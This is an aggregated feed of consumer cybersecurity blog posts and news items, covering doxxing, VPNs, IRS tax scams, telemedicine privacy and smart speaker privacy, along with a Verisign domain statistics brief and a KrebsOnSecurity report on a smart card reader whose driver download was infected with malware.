Doxxing, derived from the hacker term “dropping docs”, is internet slang for revealing someone’s identity online for the purposes of harassing them. It usually goes way beyond simply revealing someone’s email address or name and may involve personal information like a home address or workplace, SSN, financial information, phone number, pictures, texts, IP address, and other important details. The tricky thing about doxxing is that aspects of it may not be a crime, depending on what you’ve made publicly available online. However, the context in which doxxing occurs is crucial. Often it’s the first step taken to incite more severe harassment. For instance, the doxxer may not plan on taking action against their target but instead hope that someone else does. When put up against a recent Pew Research report showing that 41% of U.S. web users experience harassment in some form, it’s clear that Doxxing is a dangerous trend online. 

Why is Doxxing so Destructive?

Doxxing is a problem that’s grown in scope simply because there’s so much more data about us being kept online. Third-party services, called data brokers, capture our account info, the sites we visit, how long we spent on them, and other kinds of metadata to create profiles they then resell to advertisers. If someone gets access to these troves of data, they can reveal extremely damaging information about an individual, or data that allows a person to be damaged. For instance, with a phone number and a current address, some criminals were able to call in SWAT teams on innocent individuals. Political dissidents are often doxxed by the governments their protesting against. And on a lighter note, the adult website Ashley Madison, which promotes extramarital affairs, had their members’ data leaked online, to the embarrassment of a few public figures. 

What to Do if You’re Doxxed

The response should be very similar to the one you’d take if your wallet was stolen. Move fast, stem the loss, and begin remediation as soon as possible. Here are some broad steps that can be taken. 

• If you’ve been affected through social media, report it and get your info removed. Depending on the severity of intent, you may want to contact local law enforcement if real-world harassment is expected to result. 
• Revealed personal data is easily transmittable over the internet. Set Google alerts to see if further exposure is happening online. 
• Were financial accounts or your social security numbers revealed? Immediately change your passwords and watch for activity suggesting identity theft. A credit freeze or fraud alert may be necessary to prevent someone from opening an account in your name.  

Protect Yourself From Being Doxxed

Of course, not being doxxed in the first place is the ultimate goal of a proactive online protection plan.  Here’s what we recommend: 

Use identity theft protection 

Identity theft protection services help protect your data, monitor your online accounts like emails, SSNs, and more. In addition to online monitoring, they should also offer insurance and even theft remediation if the worst should occur. 

Share with caution 

Before you tag your location, friends, or workplace in a photo think about who has access to this information. What’s gained or lost by sharing all that info? Also, security questions for your accounts should not use the name of your pet or your first-born child if you have posted those on Facebook. 

 Use a VPN if you’re on Wi-Fi 

Public Wi-Fi networks at coffee shops and airports may not be secure against hackers and snooping. That’s why we recommend using a VPN whenever you’re connected online. This powerful tool hides your activity and location whenever you’re online on an unsecured network. 

Go ahead, Google yourself once in a while 

Googling yourself is a great way to see if anyone is using your online identity in bad ways.  

Adjust your privacy settings 

Social networks allow you to control who can see your data. Usually, with a few clicks, you can restrict what you show online to a great degree. For instance,  makes your payments viewable to other users as a default, but can easily be changed to hide them from the public. 

Protect your passwords 

Using long, complex, unique passwords for every account is convenient and maybe the best way to prevent your information from being stolen. Yes, we said convenient because with a password manager you only need to remember one key to create and manage much longer ones for all your most important accounts. 

Seize the Day Without Worrying About Doxxing

The reality is that the more we live online, the more our identities will too.  This does not mean we need to live a restricted life online. In fact, using comprehensive online protection, which features most of the tools above, we can remain free to enjoy life on our terms. Doxxing is something to be aware of, but with great protection, it’s far from anything we need to be worried about as we make the most of our lives online. 

The post Doxxing, The Internet, and How You Can Lock Down Your Data appeared first on McAfee Blog.

Why Everyone Needs a VPN

You may hear corporate cybersecurity experts hail the benefits of a VPN, or a virtual private network, to keep company information safe from ransomware attacks and cybercriminals seeking to steal valuable business secrets. It’s unlikely that everyday people, such as yourself, will be targeted by a ransomware scheme, so you may be puzzled about how a VPN can help someone like you be safer online. Luckily, with a VPN being very easy to install and use, you can indeed experience these three everyday benefits to keep your browsing activities safe from eavesdroppers seeking to profit from your online comings and goings. 

1. Stay Safe on Unsecure Networks

The most widely known benefit of a VPN for daily use is to safeguard your device when it’s connected to a public Wi-Fi network. Coffee shops, libraries, hotels, transportation hubs, and other public places often provide courtesy internet service to visitors. Shifty characters often lurk on unprotected networks to lift personally identifiable information (PII) from people handling sensitive emails, making banking transactions, or shopping online. Public Wi-Fi eavesdroppers can lift credit card numbers, addresses, birthdays, and Social Insurance Numbers. 

When you connect to public Wi-Fi that doesn’t have a lock icon, that’s a sign that you should toggle on your VPN. Also, even if you’re required to enter a password, be wary of any network you share with strangers.  

2. Hide Location Data

A VPN can also hide your location data. How does this help you protect your browsing history? First, when you scramble your location, you’re likely to confuse ad networks trying to send you targeted ads. This will free your social media feeds and search engines from targeted ads that often are so accurate they seem like an invasion of privacy. 

Second, hiding your location can protect you from cybercriminals looking to mine PII. VPNs make it impossible for criminals to discover your IP address. (The internet protocol address is what ties your device to a specific local network.) When they’re visible, criminals can trace IP addresses to reveal home addresses, full names, and phone numbers: all of which are key pieces of PII that, in the wrong hands, can jeopardize your identity.  

3. Restrict Data Snooping and Sharing 

While Canada and the European Union don’t allow ISPs (internet service providers) to even collect the browsing data of their customers, keep in mind that in some countries, like the U.S., ISPs can collect, store, share, and/or sell customer data. While advertisers are often the buyers of customer data, in the case of a breach, the more places your PII lives, the more likely it may be involved in a security incident. The goal is to limit the extent and number of places where your browsing history is stored. 

VPNs can scramble your online movements to the point where not even ISPs can track it. Plus, when you log out, your device doesn’t keep a record of what you did while connected to the VPN. Incognito mode on your internet browser hides your IP address, but the websites you visit still collect cookies and store data about your online whereabouts, meaning that it’s not truly private browsing. 

Protect Your Privacy With McAfee 

McAfee Safe Connect VPN encrypts your online activity to protect your data from prying eyes. With a premium paid plan, you can protect up to five devices at once with bank-grade Wi-Fi encryption. Feel more confident whenever you hop on the internet across all your connected devices with just one quick and easy step. 

The post Why Everyone Needs a VPN appeared first on McAfee Blog.

The IRS “Dirty Dozen” – Top Tax Season Scams to Steer Clear of This Year

Who loves tax season besides accountants? Scammers.  

Emotions can run high during tax time. Even if you’re pretty sure you did everything right, you may still have a few doubts kicking around. Did I file correctly? Did I claim the right deductions? Will I get audited? As it turns out, these are the very same anxieties that criminals use as the cornerstone of their attacks.   

So yes, crooks indeed love tax season. Particularly online. And they’ll bait your digital world with several proven types of scams in an effort to cash in on what can be a somewhat uncertain time. 

The good news is that you have plenty of ways to protect yourself from these scams. Let’s look at what scammers typically have in store, along with some practical advice to protect yourself as you file your taxes—things you can do to keep crooks out of your business this tax season. Don’t delay, download McAfee’s tax season security guide to avoid the latest tax scams.

The tax scam landscape 

First, know that you’re probably doing a good job with your taxes. Less than 2% of returns get audited and most discrepancies or adjustments can get handled easily if you address them promptly. 

Still, the wariness of the IRS and intricate tax laws makes for ripe pickings when it comes to hackers, who prey on people’s fear of audits and penalties. Common scams include fake emails, phone calls from crooks posing as IRS agents, and even robocalls that threaten jail time.  

What are crooks looking to do with their scams? Several things: 

1. Steal account information – Scammers will often try to highjack account or financial information associated with credit cards and banks to steal funds and make purchases with the victim’s accounts. 
2. File false returns – Scammers will also try and get their hands on personal information like Social Security Numbers, taxpayer ID numbers, and other unique information so that they can file false returns in the victim’s name and claim their refunds. 
3. Commit identity theft – Scammers may then use this same personal information to open new credit lines and accounts in the victim’s name, as well as commit other forms of identity theft like assuming a victim’s identity to gain employment, housing, insurance, or a driver’s license. 

As if we didn’t have enough to worry about at tax time without crooks in the mix. 

The IRS Dirty Dozen: 12 tax-season scams 

Investigating the landscape even more closely, we can turn to the authority itself, as the IRS has published its most recent top 12 tax season scams, a broad list that includes: 

Phishing attacks  Fake charities  Threatening impersonator phone calls  Social media fraud  Refund Theft  Senior Fraud

Fraud targeting non-English speakers  Unscrupulous return preparers  “Offer in Compromise” mills  Fake payments with repayment demands  Payroll and HR scams  Ransomware

 

For a comprehensive look at each one of these scams, and for ways, you can steer clear of them, check our Guide to IRS & Tax Season Scams. However, there are some common threads to many of these scams. 

For starters, plenty of tax scams involve crooks posing as an IRS employee, perhaps via a phone call or email, to glean personal information from you, or to demand payment—sometimes under the threat of penalties or even jail time. Crooks won’t hesitate to use strong-arm tactics like these and play on your fears. The good news is that such tactics are typically a sign that the contact isn’t legitimate. In fact, a quick way to spot a scam is to know what the IRS won’t do when they contact you. From the IRS.gov website, the IRS will not: 

• Initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial information. 
• Call to demand immediate payment using a specific payment method such as a prepaid debit card, gift card, or wire transfer. Mention of prepaid cards or wire transfer as a payment option is a surefire sign of a scam. 
• Demand that you pay taxes without the opportunity to question or appeal the amount they say you owe. You should also be advised of your rights as a taxpayer. 
• Threaten to bring in local police, immigration officers, or other law enforcement to have you arrested for not paying. The IRS also cannot revoke your driver’s license, business license, or immigration status. Threats like these are common tactics scam artists use to trick victims into buying into their schemes. 

What will the IRS do? Usually, the IRS will first mail a notification to any taxpayer who owes taxes. IRS collection employees might call on the phone or make an unannounced visit to your home or business. If they require payment, the payment will always be to the U.S. Treasury. Read about other ways to know what the IRS won’t do when they contact you. 

Other types of tax scams that crooks love to use 

Scammers won’t limit themselves to posing as the IRS. They’ll act as an imposter in several other ways as well. For example, they may pose as a popular do-it-yourself tax brand, a tax preparer, or even as a phony charitable organization that promises any donations you make are tax-deductible.  

Here, they may send you phony emails or direct messages or even ring you up with bogus telemarketing or robocalls designed to steal personal information. 

In the cases where the scammers reach you online, the emails and messages they send will vary in their tone and polish—in other words, how authentic they appear. Some will look nearly legitimate and cause even the most hardened of digital skeptics to click on a phony link or download a sketchy attachment. Others, well, will look clearly like spam, complete with spelling and grammatical errors, along with clumsy use of logos, layouts, and design.  

Taken together, both are ways that scammers get people to visit sites designed to compromise personal information … or to download malware like keyloggers that skim account passwords and ransomware that encrypt a victim’s files hold them hostage for a price.  

Social media attacks also made the IRS Dirty Dozen. In a social media attack, scammers harvest information from social media profiles and turn it against their victims. Per the IRS, because “social media enables anyone to share information with anyone else on the Internet, scammers use that information as ammunition for a wide variety of scams. These include emails where scammers impersonate someone’s family, friends, or co-workers.” 

With those personal details gleaned from social media, scammers will send phony links to scam sites, promote bogus charities, or flat-out ask for money or gift cards to “help them out” at tax time.  

Protecting yourself from tax season scams 

Keep your guard up for spammy messages and phishing attacks 

No question that bogus emails, messages, and phone calls remain a popular way for scammers to steal personal and financial information. Spam emails, messages, and the malicious links associated with them abound this time of year as well. It’s always to keep a critical eye open for these, and it’s particularly true during tax season.  

View all emails with attachments and links with suspicion, even if they appear to come from a person, business, or brand you know. Confirm attachments with the people you know before opening. And if you receive a message or alert about an account of yours, visit that company or organization’s website directly to enquire into the status of your account rather than taking a chance by clicking on a link that could send you to a phony website. 

File A.S.A.P. and check your credit report 

One way to protect yourself from an identity thief from claiming a return in your name is to file yours before they do. In fact, many victims of identity theft find out they’ve been scammed when they receive an IRS notification that their tax claim has already been filed. Simply put, file early. 

Here’s another tool that can help you fight identity theft. And get this: it’s not only helpful, but it’s also free. Through the Federal Trade Commission, you are entitled to a free copy of your credit report from each of the three major credit reporting companies once every 12 months. In this report, you can find inaccuracies in your credit or evidence of all-out identity theft.  

Keep in mind that you get one report from each of the reporting companies each year. That works out to three reports total in one year. Consider this: if you request one report from one credit reporting company every four months, you can spread your free credit report coverage across the whole year. 

Keep your social media profiles and posts close to the vest 

As with much of the guidance we offer around social media, one of the best ways to prevent such social media tax attacks is to make your profiles private so that only friends and family can see them. That way, scammers will have a far more difficult time reaching you. Moreover, consider paring back the information you share in your social media profiles, like your alma maters, birthday, mother’s maiden name, pet names—any personal information that a scammer may use to compromise your accounts or the security questions associated with them. 

Security software can protect you from fraud and theft too 

Protecting your devices with comprehensive online protection software can help block the phishing emails and suspicious links that make up many of these tax attacks. Likewise, it can further protect you from ransomware attacks like mentioned above. Additionally, our online Protection Score looks for weak spots in your protection and helps you shore them up, such as if discovers that your info was compromised or part of a data breach. From there, it guides you through the steps to correct the problem. 

Further, consider online protection software that offers identity theft protection as well. A strong identity theft protection package offers cyber monitoring that scans the dark web to detect misuse of your personal info. With our identity protection service, we help relieve the burden of identity theft if the unfortunate happens to you with $1M coverage for lawyer fees, travel expenses, lost wages, and more.  

Think you’ve been a victim of a tax scam? 

The IRS offers steps you can take in the event you suspect fraud or theft. Their current resources include: 

• Contacting the Treasury Inspector General for Tax Administration to report a phone scam. Use their “IRS Impersonation Scam Reporting” web page. You can also call 800-366-4484. 
• If the scam relates to your state income taxes, report it to your state Attorney General’s office. 
• Report phone scams to the Federal Trade Commission as well with the “FTC Complaint Assistant” on FTC.gov. They ask you to add “IRS Telephone Scam” in the notes. 
• Reporting an unsolicited email claiming to be from the IRS, or an IRS-related component like the Electronic Federal Tax Payment System, to the IRS at phishing@irs.gov. 

Take a deeper dive on the topic of online tax scams 

As mentioned above, you can get even more up to speed on the different tricks hackers are using by downloading our Guide to IRS & Tax Season Scams. It’s free, and it offers more ways you can protect your identity and information this tax season and year ‘round. 

The post The IRS “Dirty Dozen” – Top Tax Season Scams to Steer Clear of This Year appeared first on McAfee Blog.

Helping Mom & Dad: Online Doctor Visits and Telemedicine

Whether it’s for routine care, a prescription refill, or a simple follow-up, online doctor visits offer tremendous benefits in terms of both convenience and ease of care—all good reasons to help mom and dad get connected with it.

There’s no doubt that more older adults than ever are taking advantage of online doctor visits, more formally known as telemedicine. While usage numbers have risen dramatically across all age groups, it’s particularly so for elders. Pre- and post-pandemic numbers saw a 63-fold increase in Medicare telemedicine use.

However, many older patients are missing out and not using telemedicine for one reason or another. What’s holding them back? Several things, according to research from the University of California, San Francisco: 

• Unreadiness with regards to technology, such as not having access to a telemedicine-ready device or knowing how to use it. 
• A lack of familiarity with the internet, particularly if they have not used email, texting, or the internet in general within the past month. 
• Physical challenges, involving vision or otherwise the ability to converse over a video call. 
• No access or limited access to a broadband connection (particularly in rural areas). 

Moreover, another issue is that many older adults do not know that telemedicine is an option. Research from the University of Michigan showed that 55% of older adults surveyed were unaware if their healthcare provider even offered telemedicine as a service. And perhaps quite telling is that the same survey revealed nearly half of older adults harbored concerns about privacy and did not feel personally connected to their care provider during their visits. 

For us as children and grandchildren of older adults, it can be tough knowing that a loved one is missing out on an avenue of care that they could otherwise benefit from. While we absolutely respect what they feel is comfortable and trustworthy for them, there are several other areas where we can help the older loved ones in our lives overcome the issues and concerns they face.  

With that, let’s talk about the technology behind telemedicine and how you can help them use it, and address some of those privacy issues as well. 

Easing into telemedicine 

As indicated above, paying a visit to the doctor via telemedicine can be a big jump. Just as the idea of it is new for many of us, it’s yet newer for older adults. There’s a good chance that you’re familiar with video chats and calls already, which gives you a foundation we can work with when it’s time to see the doctor on a screen. That may not be the case for older adults. Add that into the privacy concerns and decades of seeing a doctor in person, you can see why some older adults simply choose to opt-out. 

One way you can help is to have a few video chats with your older loved ones. In addition to the regular calls you make, you might want to try having a video chat with them from time to time. It’s an outstanding way to spend time together when you can’t be together in person, and it may develop a comfort level with the technology so that they may be willing to give telemedicine a try. You can check out my earlier article in this series that covers video chats with mom and dad, along with straightforward steps to get them up and running on the technology and how to use it. 

Get them set up on the right device for telemedicine 

One thing your parents will need for their visit is a reliable device that they’re comfortable using. It could be a computer or laptop, or it may be a smartphone or tablet. Note that in some cases their healthcare provider may use a telemedicine solution that has certain requirements as well, so you’ll want to see what those are and ensure that the device mom or dad has is compatible. (For example, the care provider may have an app that’s available through the Apple App Store or Google Play. Others may have an online platform that can be accessed by several different kinds of devices.) 

If they’re using a smartphone or tablet, that will likely make things easier because the camera and microphone are already integrated into the device—all set up and ready to go. For a computer or laptop, you can help them get familiar with the setup, like the microphone levels, speaker volume, and camera. For audio, you can see a set of headphones or smartphone earbuds work well for them, which can help prevent audio feedback loops and simply make it easier to hear the caregiver.  

If you’re looking for a little assistance with a Windows computer, you can check out this quick article for setting up the audio and this article for setting up the camera. For Macs, check out this article for audio and this article for the video. 

Make sure their technology is secure 

If they don’t already have comprehensive online protection software for their devices, look into getting it. This will protect them against malware, viruses, and phishing attacks. They’ll also benefit from other features that help them manage their passwords, protect their identity, safeguard their privacy, and more. 

As for privacy in general, medical information is among the most precious information any of us have. For example, here in the U.S., we have HIPPA privacy standards to protect our medical records and conversations. Yet there’s also the issue of eavesdropping, which is a risk in practically any online communication.  

To help address privacy issues and concerns, health care providers will often post a set of Frequently Asked Questions (FAQ) as part of their telemedicine service. Within that, you’ll very likely find a section on personal privacy and the technologies in place to protect it. Here’s a good example of a telemedicine FAQ from the University of Washington Medicine and another example from the telemedicine page that Virginia Mason/Franciscan Health designed for its patients.  

In all, if your parents have concerns about their privacy, you can absolutely assure them that it’s a valid concern. Consult the provider’s FAQ for guidance. If either of you has further questions, feel free to call the healthcare provider and speak with them. 

Help them pick a private place and get prepared for the call 

In addition to digital security, there’s the possibility of physical eavesdropping, somebody actually listening in on their conversation from another room, apartment, or from the street. Help your older loved ones pick a place in their home where they can have some privacy and where they can’t be overheard by neighbors and passers-by. A bedroom is a fine place—or any location that’s familiar and comfortable as well. When choosing a private place, a well-lit location is important as well so that the camera captures a nice and clear image. 

Additionally, you can help them prep for their visit by putting together a list of things to discuss during the visit. The U.S. Department of Health and Human Services suggests writing things down: 

• Make a list of their current medications (or gather the actual bottles). 
• Write down any symptoms, questions, or concerns they want to discuss during the appointment, so they do not forget them. 
• If their doctor has requested information like their temperature or weight have this information ready. 
• Keep paper nearby to take notes about what the doctor says during the video visit. 

Make their telemedicine visit safer with these tips 

In addition to the above, there are further measures you can help your parents or older loved one take to further secure their telemedicine visit—and their internet usage in general. 

1) Use strong, unique passwords 

Your telemedicine visit may require setting up a new account and password. When doing so, make sure it’s with a strong, unique password. A password manager can help. Also found in comprehensive online protection software, a password manager can create and securely store strong and unique passwords for your mom and dad, giving them one less thing they need to remember and worry about. 

2) Use a VPN 

A VPN, or virtual private network, offers a strong layer of additional protection when you’re transmitting health data or simply having a private conversation about your health with a professional. A VPN creates an encrypted tunnel to keep you and your activity anonymous. In effect, your data is scrambled and hidden to anyone outside your VPN tunnel, thus making your private information difficult to collect. Check with the care provider to see if their telemedicine solution uses a VPN. If not, you can always get a VPN as part of your online protection software. 

3) Secure their internet router 

Beyond their devices, securing their internet router is an important step in making a telemedicine visit safe and secure. The data that travels along it is of a highly personal nature already, so make sure the router has a strong and unique password. Also, change the name of their router so it doesn’t give away their address or any other signs of their identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. If you have questions, check with their internet provider—they may even offer up a newer, more secure router to replace an older one. 

The best telemedicine choice is the one that’s right for your parents 

As with anything concerning their health, have your parents and loved ones consult with their caregivers to ensure that a telemedicine visit is a proper course for them.  

So while the technical ins and outs of preparing for a telemedicine visit may have their challenges for some older adults, we should also realize that getting comfortable with the idea of a telemedicine visit in the first place may take some time and effort. Starting with regular video chats with the family may increase familiarity and ease with holding a conversation over video. Likewise, having a conversation with their doctor about telemedicine may put some concerns to rest as well. After all, they will have a relationship with their doctor. Getting the facts from the doctor, face to face may help. 

We all want what’s best, particularly when it comes to the care of our parents and older loved ones in our lives, and choosing to try telemedicine is a highly personal decision for them. I hope this article and the resources cited within it will help you enable them to make the choice that’s comfortable, effective, and right for them. 

The post Helping Mom & Dad: Online Doctor Visits and Telemedicine appeared first on McAfee Blog.

Apple patches 87 security holes – from iPhones and Macs to Windows

Lots of fixes, with data leakage flaws and code execution bugs patched on iPhones, Macs and even Windows.

OpenSSL patches infinite-loop DoS bug in certificate verification

When it comes to writing loops in your code... never sit on the fence!

Serious Security: Darkweb drugs market Hydra taken offline by German police

Why are Tor sites hard to locate and therefore difficult to take down? We explain in plain English...

US cryptocurrency coder gets 5 years for North Korea sanctions busting

Cryptocurrency expert didn't take "No" for an answer when the US authorities said he couldn't pursue cryptocoin opps in North Korea.

S3 Ep78: Darkweb hydra, Ruby, quantum computing, and a robot revolution [Podcast]

Latest episode - listen now!

Verisign Q4 2021 The Domain Name Industry Brief: 341.7 Million Domain Name Registrations in the Fourth Quarter of 2021

Today, we released the latest issue of The Domain Name Industry Brief, which shows that the fourth quarter of 2021 closed with 341.7 million domain name registrations across all top-level domains, an increase of 3.3 million domain name registrations, or 1.0%, compared to the third quarter of 2021._^1,2 Domain name registrations have increased by 1.6 million, or 0.5%, year over year._^1,2

Check out the latest issue of The Domain Name Industry Brief to see domain name stats from the fourth quarter of 2021, including:
• Top 10 Largest TLDs by Number of Reported Domain Names
• Top 10 Largest ccTLDs by Number of Reported Domain Names
• ngTLDs as Percentage of Total TLDs
• Geographical ngTLDs as Percentage of Total Corresponding Geographical TLDs

To see past issues of The Domain Name Industry Brief, please visit verisign.com/dnibarchives.

---

1. All figure(s) exclude domain names in the .tk, .cf, .ga, .gq and .ml ccTLDs. Quarterly and year-over-year trends have been calculated relative to historical figures that have also been adjusted to exclude these five ccTLDs. For further information, please see the Editor’s Note contained in the full Domain Name Industry Brief.
2. The generic TLD, ngTLD and ccTLD data cited in the brief: (i) includes ccTLD internationalized domain names, (ii) is an estimate as of the time this brief was developed and (iii) is subject to change as more complete data is received. Some numbers in the brief may reflect standard rounding.

The post Verisign Q4 2021 The Domain Name Industry Brief: 341.7 Million Domain Name Registrations in the Fourth Quarter of 2021 appeared first on Verisign Blog.

Smarter Homes & Gardens: Smart Speaker Privacy

So is your smart speaker really listening in on your conversations? 

That’s the crux of a popular privacy topic. Namely, are we giving up some of our privacy in exchange for the convenience of a smart speaker that does our bidding with the sound of our voice? After all, you’re using it to do everything from search for music, order online, and control the lights and temperature in your home. 

What is your smart speaker really hearing—and recording? 

Let’s take a look at what’s going on inside of your smart speaker, how it processes your requests, and what companies do with the recordings and transcripts of your voice. 

So, are smart speakers listening in? 

More or less, smart speakers are listening to all the time. Each smart speaker has its own “wake word” that it listens for, like Alexa, Siri, or Google. When the device hears that wake word or thinks it hears it, it begins recording and awaits your verbal commands. Unless you have the microphone or listening feature turned off, your device indeed actively listens for that wake word all the time. 

Here’s where things get interesting, though. There’s a difference between “listening” and “recording.” The act of listening is passive. Your smart speaker is waiting to hear its name. That’s it. Once it does hear its name, it begins recording for a few seconds to record your command. From there, your spoken command goes into the company’s cloud for processing by way of an encrypted connection.  

There are exceptions to when your command may go to the company’s cloud for processing, like Siri on iPhones, which according to Apple, “You don’t sign in with your Apple ID to use Siri, and the audio of your requests is processed entirely on your iPhone.” Also, Google Assistant may process some requests without going to the cloud, like “When a user triggers a smart home Action that has a local fulfillment path, Assistant sends the EXECUTE intent or QUERY intent to the Google Home or Google Nest device rather than the cloud fulfillment.” 

In the cases where information does go to the cloud, processing entails a few things. First, it makes sure that the wake word was heard. If it’s determined that the wake word was indeed spoken (or something close enough to it—more on that in a minute), the speaker follows through on the request or command. Depending on your settings, that activity may get stored in your account history, whether as a voice recording, transcript, or both. If the wake word was not detected, processing ends at that point. 

Enter the issue of mistaken wake words. While language models and processing technologies used by smart speakers are constantly evolving, there are occasions where a smart speaker acts as if a wake word was heard when it simply wasn’t said. Several studies on the topic have been published in recent years. In the case of research from Northeastern University, it was found that dialogue from popular television shows could be interpreted as wake words that trigger recording. For example, their findings cite: 

“We then looked at other shows with a similarly high dialogue density (such as Gilmore Girls and The Office) and found that they also have a high number of activations, which suggests that the number of activations is at least in part related to the density of dialogue. However, we have also noticed that if we consider just the amount of dialogue (in a number of words), Narcos is the one that triggers the most activations, even if it has the lowest dialogue density.” 

Of interest is not just the volume of dialogue, but the pronunciation of the dialogue: 

“We investigated the actual dialogue that produced Narcos‘ activations and we have seen that it was mostly Spanish dialogue and poorly pronounced English dialogue. This suggests that, in general, words that are not pronounced clearly may lead to more unwanted activations.” 

Research such as this suggests that smart speakers at the time had room for improvement when it comes to properly detect wake words, thus leading to parts of conversation being recorded without the owner intending it. If you own a smart speaker, I wouldn’t be too surprised to hear that you’ve had some issues like that from time to time yourself. 

Is someone on the other end of my smart speaker listening to my recordings? 

As mentioned above, the makers of smart speakers make constant improvements to their devices and services, which may include the review of commands from users to make sure they are interpreted correctly. There are typically two types of review—machine and human. As the names suggest, a machine review is a digital analysis and human reviews entail someone listening to and evaluating a recorded command or reading and evaluating a transcript of a written command. 

However, several manufacturers let you exercise some control over that. In fact, you’ll find that they post a fair share of articles about this collection and review process, along with your choices for opting in or out as you wish: 

• Apple explains its review process for Siri here, along with ways that you can opt-out of these reviews. For more information about their overall privacy measures, visit Apple’s page here. 

• Amazon also explains how it uses such information and likewise how you can opt-out, such as by automatically deleting your recordings. You can learn more about their overall privacy measures for Alexa here. 
• As of April 2022, Google states that it does not retain your audio recordings by default—and you can browse or delete your Google Assistant history here. 

Setting up your smart speaker for better privacy 

The quickest way to ensure a more private experience with your smart speaker is to disable listening—or turn it off entirely. Depending on the device, you may be able to do this with the push of a button, a voice command, or some combination of the two. This will keep the device from listening for its wake word. Likewise, this makes your smart speaker unresponsive to voice commands until you enable them again. This approach works well if you decide there are certain stretches of the day where your smart speaker doesn’t need to be on call. 

Yet let’s face it, the whole idea of a smart speaker is to have it on and ready to take your requests. For those stretches where you leave it on, there’s another step you can take to shore up your privacy.  

In addition to making sure you’re opted out of the review process mentioned above, you can also delete your recordings associated with your voice commands. 

• For Google Assistant users, Google provides the following article. 
• Siri users can follow these instructions to delete their recordings. 
• You can manage your Alexa recordings with these instructions as well.  

Managing your voice history like this gives you yet one more way you can take control of your privacy. In many ways, it’s like deleting your search history from your browser. And when you consider just how much activity and how many queries your smart speaker may see over the course of days, weeks, and months, you can imagine just how much information that captures about you and your family. Some of it is undoubtedly personal. Deleting that history can help protect your privacy in the event that information ever gets breached or somehow ends up in the hands of a bad actor.  

Lastly, above and beyond these privacy tips for your smart speakers, comprehensive online protection will help you look out for your privacy overall. In the case of ours, we provide a full range of privacy and device protection, along with identity theft protection that includes $1M identity theft coverage, identity monitoring, and identity restoration assistance from recovery pros—and antivirus too, of course. Together, they can make your time spent online far more secure. 

You’re the smart one in this relationship 

With privacy becoming an increasingly hot topic (rightfully so!), several companies have been taking steps to make the process of managing yours easier and a more prevalent part of their digital experience. As you can see, there are several ways you can take charge of how your smart speaker uses, and doesn’t use, your voice. 

It used to be that many of these settings were tucked away deep in menus, rather than something companies would tout on web pages dedicated to privacy. So as far as smart speakers go, the information is out there, and I hope this article helps make the experience with yours more private and secure.  

The post Smarter Homes & Gardens: Smart Speaker Privacy appeared first on McAfee Blog.

How to Use Windows Security to Keep Your PC Protected

Your Microsoft computer comes with built-in safety software that shields you from the worst threats. Here's how to navigate your toolkit.

Every ISP in the US Must Block These 3 Pirate Streaming Services

The 96 internet service providers were told to enforce the orders “by any technological means available.”

You didn’t leave enough space between ROSE and AND, and AND and CROWN

What weird Google Docs bug connects the words THEREFORE, AND, SECONDLY, WHY, BUT and BESIDES?

He sold cracked passwords for a living – now he’s serving 4 years in prison

Crooks don't need a password for every user on your network to break in and wreak havoc. One could be enough...

FBI: Hackers Used Malicious PHP Code To Grab Credit Card Data

Don't Accidentally Hire A North Korean Hacker, FBI Warns

When Your Smart ID Card Reader Comes With Malware

Millions of U.S. government employees and contractors have been issued a secure smart ID card that enables physical access to buildings and controlled spaces, and provides access to government computer networks and systems at the cardholder’s appropriate security level. But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online. What could go wrong? Here’s one example.

KrebsOnSecurity recently heard from a reader — we’ll call him “Mark” because he wasn’t authorized to speak to the press — who works in IT for a major government defense contractor and was issued a Personal Identity Verification (PIV) government smart card designed for civilian employees. Not having a smart card reader at home and lacking any obvious guidance from his co-workers on how to get one, Mark opted to purchase a $15 reader from Amazon that said it was made to handle U.S. government smart cards.

The USB-based device Mark settled on is the first result that currently comes up one when searches on Amazon.com for “PIV card reader.” The card reader Mark bought was sold by a company called Saicoo, whose sponsored Amazon listing advertises a “DOD Military USB Common Access Card (CAC) Reader” and has more than 11,700 mostly positive ratings.

The Common Access Card (CAC) is the standard identification for active duty uniformed service personnel, selected reserve, DoD civilian employees, and eligible contractor personnel. It is the principal card used to enable physical access to buildings and controlled spaces, and provides access to DoD computer networks and systems.

Mark said when he received the reader and plugged it into his Windows 10 PC, the operating system complained that the device’s hardware drivers weren’t functioning properly. Windows suggested consulting the vendor’s website for newer drivers.

So Mark went to the website mentioned on Saicoo’s packaging and found a ZIP file containing drivers for Linux, Mac OS and Windows:

Out of an abundance of caution, Mark submitted Saicoo’s drivers file to Virustotal.com, which simultaneously scans any shared files with more than five dozen antivirus and security products. Virustotal reported that some 43 different security tools detected the Saicoo drivers as malicious. The consensus seems to be that the ZIP file currently harbors a malware threat known as Ramnit, a fairly common but dangerous trojan horse that spreads by appending itself to other files.

Ramnit is a well-known and older threat — first surfacing more than a decade ago — but it has evolved over the years and is still employed in more sophisticated data exfiltration attacks. Amazon said in a written statement that it was investigating the reports.

“Seems like a potentially significant national security risk, considering that many end users might have elevated clearance levels who are using PIV cards for secure access,” Mark said.

Mark said he contacted Saicoo about their website serving up malware, and received a response saying the company’s newest hardware did not require any additional drivers. He said Saicoo did not address his concern that the driver package on its website was bundled with malware.

In response to KrebsOnSecurity’s request for comment, Saicoo sent a somewhat less reassuring reply.

“From the details you offered, issue may probably caused by your computer security defense system as it seems not recognized our rarely used driver & detected it as malicious or a virus,” Saicoo’s support team wrote in an email.

“Actually, it’s not carrying any virus as you can trust us, if you have our reader on hand, please just ignore it and continue the installation steps,” the message continued. “When driver installed, this message will vanish out of sight. Don’t worry.”

The trouble with Saicoo’s apparently infected drivers may be little more than a case of a technology company having their site hacked and responding poorly. Will Dormann, a vulnerability analyst at CERT/CC, wrote on Twitter that the executable files (.exe) in the Saicoo drivers ZIP file were not altered by the Ramnit malware — only the included HTML files.

Dormann said it’s bad enough that searching for device drivers online is one of the riskiest activities one can undertake online.

“Doing a web search for drivers is a VERY dangerous (in terms of legit/malicious hit ratio) search to perform, based on results of any time I’ve tried to do it,” Dormann added. “Combine that with the apparent due diligence of the vendor outlined here, and well, it ain’t a pretty picture.”

But by all accounts, the potential attack surface here is enormous, as many federal employees clearly will purchase these readers from a myriad of online vendors when the need arises. Saicoo’s product listings, for example, are replete with comments from customers who self-state that they work at a federal agency (and several who reported problems installing drivers).

A thread about Mark’s experience on Twitter generated a strong response from some of my followers, many of whom apparently work for the U.S. government in some capacity and have government-issued CAC or PIV cards.

